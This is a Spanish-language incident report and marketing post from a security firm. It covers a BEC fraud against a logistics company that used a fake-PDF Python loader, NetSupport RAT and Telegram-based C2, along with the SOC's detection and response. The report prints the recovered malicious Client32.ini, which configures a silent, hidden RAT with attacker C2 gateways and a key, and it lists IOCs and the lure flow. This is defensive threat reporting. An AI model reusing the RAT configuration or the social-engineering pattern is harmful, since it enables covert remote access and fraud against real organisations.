Caso real: Empresa del sector logístico víctima de fraude BEC con NetSupport RAT (nombre del cliente omitido por confidencialidad)
🔑 Puntos clave
| Fecha/Hora (CET) | Evento |
|---|---|
| 8 Dic - Inicio | Inicio de conversación por email. Atacante (“Michał Grzegorzewski”) simula ser cliente legítimo negociando cargas de transporte (NL a FR, 8T, 1.200€ - 1.500€). |
| 8-15 Dic | Conversación sostenida durante 8 días. Negociación de precios, rutas y detalles técnicos (FTL) para generar confianza en la víctima. |
| 16 Dic - 11:31 | Email malicioso: atacante redirige a víctima a portal fraudulento euroads[.]eu para “registrarse” y descargar “orden de carga”. |
| 16 Dic - 12:00 | Víctima descarga Order_024771.exe (Python Loader con icono de PDF falso) desde portal clonado euroads[.]eu/order. |
| 16 Dic - 12:05 | Ejecución manual del loader. Conexión inmediata a VPS C2 en Nueva York (173.225.111.189 - Interserver Inc) para recuperar payloads. |
| 16 Dic - 12:10 | Despliegue de NetSupport Manager RAT (Client.exe legítimo + DLLs maliciosas). Configuración silenciosa: sin alertas visuales, C2 a akusa.icu:443 y 45.93.20.177:443. |
| 16 Dic - 12:12 | Despliegue de Telegram.exe (herramienta .NET personalizada para C2/exfiltración vía API de Telegram). Tráfico HTTPS legítimo oculta comunicación maliciosa. |
| 16 Dic - 14:00 | Detección SOC: Identificación de Python Loader conectándose a VPS extranjero + NetSupport ejecutándose desde directorios no estándar + Telegram.exe no oficial (.NET). |
| 16 Dic - 14:15 | Respuesta SOC: Aislamiento del endpoint, terminación de procesos maliciosos, cambio de credenciales y eliminación de backdoors. |
🎯 Anatomía de un fraude BEC a empresas de logística (Python Loader + Telegram C2 + NetSupport - Bypass SentinelOne)
📋 Descripción del Incidente
🎣 Acceso Inicial: Ingeniería Social por email (larga duración)
El vector de entrada se distingue por su alta sofisticación y paciencia. A diferencia de campañas masivas, el atacante mantuvo un hilo de correos coherente negociando precios (1.200€ - 1.500€), rutas (NL a FR) y detalles técnicos (FTL, 8T) durante 8 días.
El 16 de diciembre, tras simular un acuerdo, el atacante (“Michał”) indicó a la víctima que debía registrarse en una plataforma externa para “reservar la carga” y descargar el PDF de la orden.
Extracto del correo malicioso (El gancho):
De: Michał Grzegorzewski mgrzegorzewski2.kaspeda@gmail.com
Enviado: martes, 16 de diciembre de 2025 11:31
Para: [REDACTADO]
Asunto: Re: Factura con POD
La víctima accedió al dominio euroads[.]eu/order un portal clonado / fraudulento, donde descargó el archivo malicioso.
⚡ Ejecución y Staging (Python Loader)
El archivo descargado se llamaba Order_024771.exe. A pesar de tener un icono de documento PDF para engañar al usuario, era un ejecutable compilado de Python que actuaba como loader de la herramienta Telegram.exe (explicada más adelante) y el ejecutable de NetSupport modificado.
Inmediatamente tras su ejecución manual por parte del usuario, el proceso Order_024771.exe inició una conexión de red saliente para recuperar los payloads finales.
Destino de la conexión:
Esta IP corresponde a un VPS alquilado por el atacante, utilizado como C2 de primera etapa.
📦 Despliegue de NetSupport RAT
Una vez contactado el VPS, el stager soltó en el disco los componentes de NetSupport Manager:
🕵️ Análisis Forense de Configuración (NetSupport Client32.ini)
Durante el análisis forense del disco, recuperamos el archivo de configuración del malware (Client32.ini). Su contenido confirma la intención maliciosa, ya que deshabilita todas las alertas visuales para el usuario y configura servidores de Mando y Control (C2) externos.
Configuración recuperada:
[Client]
_present=1
DisableChatMenu=1 ; Evita que el usuario vea opciones de chat
DisableClientConnect=1 ; Oculta conexión
DisableDisconnect=1 ; Impide al usuario desconectar el RAT
HideWhenIdle=1
ShowUIOnConnect=0 ; No muestra interfaz al conectarse el atacante
silent=1 ; Modo silencioso activado
SysTray=0 ; Oculta el icono en la barra de tareas
Usernames=* ; Permite conexión a cualquier usuario logueado
[HTTP]
GatewayAddress=akusa.icu:443 ; C2 Primario
SecondaryGateway=45.93.20.177:443 ; C2 de Respaldo (IP de Chang Way Technologies Co. Limited)
GSK=EDHF;I>MBBEHHO<G
Interpretación: El atacante ha configurado el RAT para que sea invisible (SysTray=0, silent=1). Utiliza un dominio (akusa.icu) y una IP directa como respaldo para asegurar la conexión. El valor GSK es la clave de cifrado necesaria para comunicarse con el Gateway del atacante.
🤖 Exfiltración vía Telegram (.NET) y Evasión
Paralelamente al RAT, se desplegó un binario denominado Telegram.exe. El análisis forense confirma que no es la aplicación oficial, sino una herramienta .NET desarrollada por el atacante.
Propósito: Utilizar la API pública de Telegram como canal de Mando y Control (C2). Esto permite que el tráfico de exfiltración de datos se mezcle con el tráfico HTTPS legítimo, dificultando su detección por firewalls convencionales.
🔍 Detección y IOCs (Indicadores de Compromiso)
🌐 Red e Infraestructura
📂 Hash de Archivos (SHA256)
🚨 Respuesta por parte del SOC
🧩 Cómo nuestro Adversary-Aware SOC detectó y neutralizó este ataque
Nuestro Adversary-Aware SOC identificó y bloqueó este sofisticado ataque BEC mediante múltiples capas de defensa:
| Área de Defensa Merabytes | Cómo actuó nuestro SOC | Resultado obtenido |
|---|---|---|
| Análisis de comportamiento de email | Detección de ingeniería social prolongada: negociación inusual seguida de enlace externo para descarga de “orden”. | Alerta temprana antes de que usuarios descarguen el ejecutable malicioso. |
| Análisis de amenazas en endpoints | Detección de Python Loader ejecutándose desde Downloads con conexión C2 inmediata a VPS extranjero. | Bloqueo del loader antes de descargar el RAT. |
| Detección de RAT comerciales | Identificación de NetSupport Client.exe ejecutándose desde directorios no estándar con configuración silenciosa. | Terminación del proceso RAT y aislamiento del endpoint. |
| Monitorización de Side-Loading | Detección de Client.exe cargando DLLs maliciosas desde directorios temporales en lugar de Program Files. | Prevención de la carga de componentes maliciosos. |
| Análisis de tráfico Telegram | Detección de Telegram.exe no oficial (.NET) comunicándose con API de Telegram para C2/exfiltración. | Bloqueo de canal C2 alternativo y prevención de exfiltración. |
| Análisis de vulnerabilidades y IOCs | Base de datos actualizada con IOCs del ataque: hashes, dominios (euroads[.]eu, akusa.icu), IPs (173.225.111.189). | Bloqueo proactivo de infraestructura maliciosa conocida. |
Gracias a nuestro enfoque centrado en el adversario, el SOC no solo identificó las anomalías técnicas, sino que comprendió la táctica completa del atacante: ingeniería social de larga duración + Python stager + RAT comercial + C2 alternativo vía Telegram. Esta visión holística permitió una respuesta coordinada que cortó la cadena de ataque en múltiples puntos.
📚 Lecciones aprendidas
Conclusión
El ataque fue detectado y neutralizado porque nuestro SOC implementa defensa adaptativa, monitoreo continuo y análisis de comportamiento. Con Merabytes, la historia terminó bien:
#ciberseguridad #bec #businessemailcompromise #netsupport #rat #logistics #dfir #merabytes
Si te interesa proteger tu infraestructura contra ataques BEC sofisticados y RATs comerciales, visita merabytes.com y solicita acceso a nuestros servicios de monitorización continua, protección de endpoints y análisis de comportamiento.
Descubre cómo nuestro Adversary-Aware Security Operations Center identifica y neutraliza amenazas de forma proactiva antes de que impacten tu negocio.
Un Adversary-Aware SOC va más allá del monitoreo de seguridad tradicional al comprender las tácticas, técnicas y procedimientos (TTPs) de los atacantes. Cazamos amenazas de forma proactiva usando el framework MITRE ATT&CK, análisis de comportamiento e inteligencia de amenazas para detectar ataques que evaden los controles de seguridad convencionales.
Las herramientas de seguridad tradicionales se enfocan en firmas e indicadores conocidos. Nuestra detección por comportamiento analiza anomalías en la actividad de usuarios, patrones de correo, tráfico de red y comportamiento del sistema para identificar ataques sofisticados que usan herramientas legítimas o evaden controles de autenticación. Esto detectó los ataques en estos casos de estudio antes de que ocurriera un daño significativo.
Nuestro SOC opera 24/7 con monitoreo en tiempo real y capacidades de respuesta automatizada. Las alertas críticas activan investigación inmediata y acciones de contención en minutos. Proporcionamos caza de amenazas continua, análisis forense y respuesta coordinada a incidentes para minimizar el impacto y prevenir el movimiento lateral.
Combinamos feeds de inteligencia de amenazas globales con nuestra propia investigación de incidentes reales. Cada ataque que analizamos contribuye a nuestras reglas de detección y base de datos de IOCs, que se comparte inmediatamente en todos los entornos protegidos. Esto significa que si vemos un nuevo patrón de ataque contra un cliente, todos los clientes están automáticamente protegidos en horas.
Absolutamente. Nuestro SOC se integra con sus herramientas existentes de EDR, XDR, SIEM, firewalls, seguridad de correo y protección de identidad. Mejoramos su efectividad correlacionando eventos de todas las fuentes, aplicando lógica de detección consciente de adversarios y proporcionando análisis humano experto que las herramientas automatizadas por sí solas no pueden lograr.